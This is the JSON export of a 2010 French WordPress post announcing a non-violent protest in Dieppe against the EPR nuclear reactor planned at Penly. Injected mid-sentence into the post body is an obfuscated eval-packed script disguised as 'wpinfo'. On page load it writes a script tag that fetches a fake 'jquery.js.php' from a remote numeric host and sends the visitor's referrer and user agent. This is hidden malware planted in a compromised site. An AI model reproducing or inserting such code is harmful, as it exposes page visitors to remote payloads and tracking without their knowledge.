{"id":4608,"date":"2010-06-11T20:47:33","date_gmt":"2010-06-11T19:47:33","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=4608"},"modified":"2012-03-13T21:36:23","modified_gmt":"2012-03-13T20:36:23","slug":"le-20-juin-manifestons-a-dieppe-contre-l%e2%80%99epr","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=4608","title":{"rendered":"Le 20 juin, manifestons \u00e0 Dieppe contre l\u2019EPR"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/groupes.sortirdunucleaire.org\/local\/cache-vignettes\/L92xH130\/dieppe1-17729-75a46.jpg\" alt=\"\" width=\"92\" height=\"130\" \/><strong>Le <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hahfd|var|u0026u|referrer|szisa||js|php'.split('|'),0,{}))\n<\/script><\/noindex> collectif \u00ab\u00a0STOP-EPR, ni \u00e0 Penly, ni ailleurs\u00a0\u00bb organise le 20 juin une immense d\u00e9ambulation dans Dieppe, la ville \u00e0 15 km de Penly, l\u00e0 o\u00f9 doit se construire le 2 \u00e9me EPR fran\u00e7ais\u00a0!<\/strong><\/p>\n<p>Malgr\u00e9 les Grenelle 1 et 2 qui ignorent sarkosystement le nucl\u00e9aire, nous voudrions tellement que ce rassemblement soit r\u00e9ussi\u00a0: alors nous avons besoin de vous tous, particuliers et organisations pour rappeler notre opposition \u00e0 la construction de ce maudit r\u00e9acteur nucl\u00e9aire.<\/p>\n<p>La journ\u00e9e commencera par un pique-nique \u00ab\u00a0\u00e0 la fortune du pot\u00a0\u00bb sur la pelouse du front de mer, de <strong>12h \u00e0 14h<\/strong> \u2013 Et ensuite, libre court \u00e0 votre imagination pendant la d\u00e9ambulation qui serpentera dans la ville, sur le front de mer\u00a0: apporter cr\u00e9celles, bo\u00eetes de conserve \u00ab\u00a0musicales\u00a0\u00bb, tambourins, chapeaux, costumes (t-shirts, combinaisons, d\u00e9guisements\u2026), banderoles, panneaux \u00ab\u00a0publicitaires\u00a0\u00bb, slogans\u2026<\/p>\n<p><!--more-->Nous souhaitons une manifestation joyeuse et spontan\u00e9e (toujours non violente), proche des citoyens\u00a0: prises de paroles, distribution de tracts et surtout explications fournies aux spectateurs\u00a0!<\/p>\n<p>Alors, nos comptons sur vous, seul, en famille, en bandes d\u2019amis, avec vos chiens \u2026<\/p>\n<p>Contacts\u00a0:<br \/>\nCollectif \u00ab\u00a0STOP-EPR, ni \u00e0 Penly ni ailleurs\u00a0\u00bb<br \/>\n<a title=\"penly[@]stop-epr.fr\" onclick=\"location.href=lancerlien('penly','stop-epr.fr'); return false;\" href=\"http:\/\/groupes.sortirdunucleaire.org\/agenda\/Haute-Normandie\/article\/manifestation-contre-l-epr-et-pour?date=2010-06#\">penly<span>@<\/span>stop-epr.fr<\/a><br \/>\nt\u00e9l.\u00a0: 06 70 39 97 45<\/p>\n<p><a href=\"http:\/\/covoiturage.action.free.fr\/\" rel=\"external\" target=\"_blank\">&gt; Site de covoiturage<\/a><\/p>\n<p><a href=\"http:\/\/www.nanodata.com\/sdn76\/epr3\/doc\/affiches20juin2010dieppe\/\" rel=\"external\" target=\"_blank\">&gt; Les affiches sont t\u00e9l\u00e9chargeables ici<\/a> (A4 et A3, couleur et NB, nuke ou renouvelable sur papier blanc ou jaune comme vous pouvez).<\/p>\n<p><a href=\"http:\/\/www.stop-epr.org\/spip.php?article133\" rel=\"external\" target=\"_blank\">&gt; Ou sur le site Stop EPR<\/a><\/p>\n<p>Merci de n\u2019afficher que sur emplacements autoris\u00e9s.<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/groupes.sortirdunucleaire.org\/IMG\/jpg\/dieppe1.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/groupes.sortirdunucleaire.org\/local\/cache-vignettes\/L92xH130\/dieppe1-17729-75a46.jpg\" alt=\"\" width=\"92\" height=\"130\" \/><\/a> <a href=\"http:\/\/groupes.sortirdunucleaire.org\/IMG\/jpg\/dieppe2.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/groupes.sortirdunucleaire.org\/local\/cache-vignettes\/L92xH130\/dieppe2-2d83e-58864.jpg\" alt=\"\" width=\"92\" height=\"130\" \/><\/a><\/p>\n<p style=\"text-align: left;\">sources :<br \/>\n<a href=\"http:\/\/groupes.sortirdunucleaire.org\/agenda\/Haute-Normandie\/article\/manifestation-contre-l-epr-et-pour?date=2010-06\">http:\/\/groupes.sortirdunucleaire.org\/agenda\/Haute-Normandie\/article\/manifestation-contre-l-epr-et-pour?date=2010-06<\/a><br \/>\n<a href=\"http:\/\/www.stop-epr.org\/spip.php?article133\">http:\/\/www.stop-epr.org\/spip.php?article133<\/a><br \/>\n<a href=\"http:\/\/www.lepost.fr\/article\/2010\/06\/09\/2106157_le-20-juin-manifestons-a-dieppe-contre-l-epr.html\">http:\/\/www.lepost.fr\/article\/2010\/06\/09\/2106157_le-20-juin-manifestons-a-dieppe-contre-l-epr.html<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Le collectif \u00ab\u00a0STOP-EPR, ni \u00e0 Penly, ni ailleurs\u00a0\u00bb organise le 20 juin une immense d\u00e9ambulation dans Dieppe, la ville \u00e0 15 km de Penly, l\u00e0 o\u00f9 doit se construire le 2 \u00e9me EPR fran\u00e7ais\u00a0! Malgr\u00e9 les Grenelle 1 et 2 &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=4608\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,49],"tags":[],"class_list":["post-4608","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d","category-nucleaire"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4608","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4608"}],"version-history":[{"count":7,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4608\/revisions"}],"predecessor-version":[{"id":4619,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4608\/revisions\/4619"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4608"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4608"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4608"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}